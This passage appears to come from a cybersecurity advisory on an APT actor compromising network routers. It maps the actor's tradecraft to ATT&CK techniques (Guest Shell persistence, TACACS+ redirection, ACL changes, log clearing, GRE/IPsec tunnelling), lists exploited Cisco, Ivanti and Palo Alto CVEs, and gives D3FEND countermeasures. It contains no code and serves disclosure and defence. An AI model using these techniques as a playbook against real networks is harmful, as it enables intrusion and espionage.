| Trusted Relationship | T1199 | Leverage trusted connections between providers to pivot between networks |
| Technique Title | ID | Use |
|---|---|---|
| System Services | T1569 | Executing commands via SNMP |
| Container Administration Command | T1609 | Use Guest Shell to load open-source tools and as a jump point for reconnaissance and follow-on actions in the environment |
| Command and Scripting Interpreter: Python | T1059.006 | Use Python script siet.py |
| Command and Scripting Interpreter: Network Device CLI | T1059.008 | Use built-in CLI on network devices to execute native commands |
| Technique Title | ID | Use |
|---|---|---|
| Create Account: Local Account | T1136.001 | Create new local users on network devices for persistence |
| Container Service | T1543.005 | Leverage Linux-based Guest Shell containers, natively supported in a variety of Cisco OS software |
| Account Manipulation: SSH Authorized Keys | T1098.004 | Regain entry into environments via SSH into network devices |
| Technique Title | ID | Use |
|---|---|---|
| Exploitation for Privilege Escalation | T1068 | Exploit CVE-2023-20273 to gain root-level user privileges |
| Brute Force: Password Cracking | T1110.002 | Brute force passwords with weak encryption in obtained configuration files |
| Technique Title | ID | Use |
|---|---|---|
| Obfuscated Files or Information: Command Obfuscation | T1027.010 | Obfuscate paths with “double encoding” |
| Obfuscated Files or Information | T1027 | Obfuscate source IP addresses in system logs, as actions may be recorded as originating from local IP addresses |
| Impair Defenses: Disable or Modify System Firewall | T1562.004 | Modify ACLs, adding IP addresses to bypass security policies and permit traffic from a threat actor-controlled IP address |
| Deploy Container | T1610 | Deploy virtual container (e.g., Guest Shell) on network infrastructure to persist and evade monitoring services |
| Indicator Removal | T1070 | Delete and/or clear logs |
| Indicator Removal: Clear Persistence | T1070.009 | Use Guest Shell destroy command to deactivate and uninstall Guest Shell container and return all resources to the system |
| Network Boundary Bridging | T1599 | Abuse peering connections |
| Technique Title | ID | Use |
|---|---|---|
| Network Sniffing | T1040 | Passively collect packet capture (PCAP) from networks for configurations and credentials |
| Modify Authentication Process | T1556 | Modify a router’s TACACS+ server configuration to point to an APT actor-controlled IP address to capture authentication attempts or modify AAA configurations to use less secure authentication methods |
| OS Credential Dumping | T1003 | Collect router configuration with weak Cisco Type 7 passwords |
| Brute Force: Password Cracking | T1110.002 | Brute force weak hashed Cisco Type 5 password |
| Technique Title | ID | Use |
|---|---|---|
| System Information Discovery | T1082 | Leverage CLI on network devices to gather system information |
| System Network Configuration Discovery | T1016 | Enumerate interfaces/VRFs/routing/ACLs and related network settings from the device CLI/SNMP |
| Technique Title | ID | Use |
|---|---|---|
| Remote Services | T1021 | Enumerate and alter the SNMP configurations for other devices in the same community group |
| Remote Services: SSH | T1021.004 | Enable SSH servers and open external-facing ports on network devices to maintain encrypted remote access |
| Technique Title | ID | Use |
|---|---|---|
| Archive Collected Data | T1560 | Compile configurations and packet captures |
| Data from Configuration Repository: SNMP (MIB Dump) | T1602.001 | Target MIB to collect network information via SNMP |
| Data from Configuration Repository: Network Device Configuration Dump | T1602.002 | Acquire credentials by collecting network device configurations |
| Data from Local System | T1005 | Passively collect PCAP from specific ISP customer networks |
| Technique Title | ID | Use |
|---|---|---|
| Proxy | T1090 | Use VPS for C2 |
| Proxy: Multi-hop Proxy | T1090.003 | Leverage open source multi-hop pivoting tools, such as STOWAWAY, to build chained relays for command and control and operator access |
| Application Layer Protocol | T1071 | Open and expose a variety of different services (e.g., Secure Shell [SSH], Secure File Transfer Protocol [SFTP], Remote Desktop Protocol [RDP], File Transfer Protocol [FTP], HTTP, HTTPS) |
| Non-Standard Port | T1571 | Utilize non-standard ports to evade detection by security monitoring tools that focus on standard port activity |
| Protocol Tunneling | T1572 | Create tunnels over protocols such as GRE, mGRE, or IPsec on network devices |
| Non-Application Layer Protocol | T1095 | Use GRE/IPsec to carry C2 over non-application layer protocols |
| Technique Title | ID | Use |
|---|---|---|
| Exfiltration over Alternative Protocol | T1048.003 | Use tunnels, such as IPsec and GRE, to conduct C2 and exfiltration activities |
Appendix B: CVEs exploited
| CVE | Vendor/Product | Details |
|---|---|---|
| CVE-2024-21887 | Ivanti Connect Secure and Ivanti Policy | Command injection vulnerability, commonly chained after CVE-2023-46805 (authentication bypass) |
| CVE-2024-3400 | Palo Alto Networks PAN-OS GlobalProtect | Arbitrary file creation leading to OS command injection, allowing for unauthenticated remote code execution (RCE) on firewalls when GlobalProtect is enabled on specific versions/configurations |
| CVE-2023-20273 | Cisco IOS XE | Web management user interface post-authentication command injection/privilege escalation (commonly chained with CVE-2023-20198 for initial access to achieve code execution as root) |
| CVE-2023-20198 | Cisco IOS XE | Authentication bypass vulnerability to create unauthorized administrative accounts |
| CVE-2018-0171 | Cisco IOS and IOS XE | Smart Install remote code execution vulnerability |
Appendix C: MITRE D3FEND Countermeasures
| Countermeasure Title | ID | Details |
|---|---|---|
|
Platform Monitoring |
Regularly review network device (especially router) logs and configurations for evidence of any unexpected, unapproved, or unusual activity, especially for changes to network tunnels, AAA configurations, ACLs, packet captures or network mirroring, and virtual containers | |
| Network Traffic Community Deviation | D3-NTCD | Check for unexpected GRE or other tunneling protocols, unexpected TACACS+ or RADIUS servers, or other unusual traffic |
|
Outbound Traffic Filtering |
Disable outbound connections from management interfaces | |
|
Application Configuration Hardening |
Disable all unused ports and protocols (both traffic and management protocols), disable Cisco smart install, disable Cisco Guest Shell, use only strong cryptographic algorithms | |
| Change Default Password | D3-CFP | Change all default administrative credentials and SNMP community strings |
|
Credential Hardening |
Disable password authentication where possible, use strong PKI-based or multifactor authentication, use strong cryptographic password storage settings (i.e., Cisco Type 8), and use lockouts to slow brute force attempts | |
|
Software Update |
Update software to patch known vulnerabilities and upgrade devices to supported versions | |
|
Network Isolation |
Implement management-plane isolation and control-plane policing (CoPP) to keep all network management traffic separate from data plane traffic | |
|
Inbound Traffic Filtering |
Ensure management VRFs cannot receive traffic from the data plane |

